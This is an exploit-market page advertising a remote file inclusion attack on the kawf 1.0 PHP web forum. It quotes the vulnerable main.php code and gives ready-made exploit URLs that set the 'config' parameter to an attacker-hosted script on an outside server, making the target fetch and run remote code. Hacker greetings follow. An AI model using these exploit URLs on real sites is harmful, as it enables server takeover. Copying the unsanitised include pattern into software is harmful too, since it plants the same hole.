[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

kawf <= 1.0 (main.php) Remote File Include Vulnerability

Author
o0xxdark0o
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1035
Category
web applications
Date add
20-10-2006
Platform
unsorted
========================================================
kawf <= 1.0 (main.php) Remote File Include Vulnerability
========================================================




####################################################################
#       kawf (config)  Remote File Include
#---------------------------------------------------------------------------------------------
#       Kawf is a web forum written in PHP4 using MySQL
#        v. 1.0 and all below
#--------------------------------------------------------------------------------------------
#       download :
#       http://sourceforge.net/projects/kawf
#--------------------------------------------------------------------------------------------
#       bug in  :
#       main.php
#--------------------------------------------------------------------------------------------
#code : { i wrote all code for s000e :D :D } include in line 13 ::
#                                                       #
#                                                       /* First setup the path */
#                                                       $include_path = "$srcroot/include:$srcroot/user/account";
#                                                       if (isset($include_append))
#                                                         $include_path .= ":" . $include_append;
#
#                                                       $old_include_path = ini_get("include_path");
#                                                       if (!empty($old_include_path))
#                                                         $include_path .= ":" . $old_include_path;
#                                                       ini_set("include_path", $include_path);
#
#                                                       include_once("$config.inc");
#                                                       require_once("sql.inc");
#                                                       require_once("util.inc");
#                                                       require_once("page.inc");
#                                                       require_once("forumuser.inc");
#
#                                                       sql_open($database);
#
#                                                       include("index.php");
#
#                                                       sql_close();
#                                                       ?>
#--------------------------------------------------------------------------------------------
#       exploit:
#          kawf/user/account/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
#                                          or
#         (path)/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
#--------------------------------------------------------------------------
#       greetz :  str0ke ,  c0ldz3r0 ,  all members in  xp10.cc , dm3r7.com , 4azhar.com all my friend in msn :D
#      inter_vieri_21 dont play runescape :d :d
#-------------------------------------------------------------------------
#      by o0xxdark0o
# i think... so that... i m here
#  o0xxdark0o
####################################################################



#  0day.today [2024-12-25]  #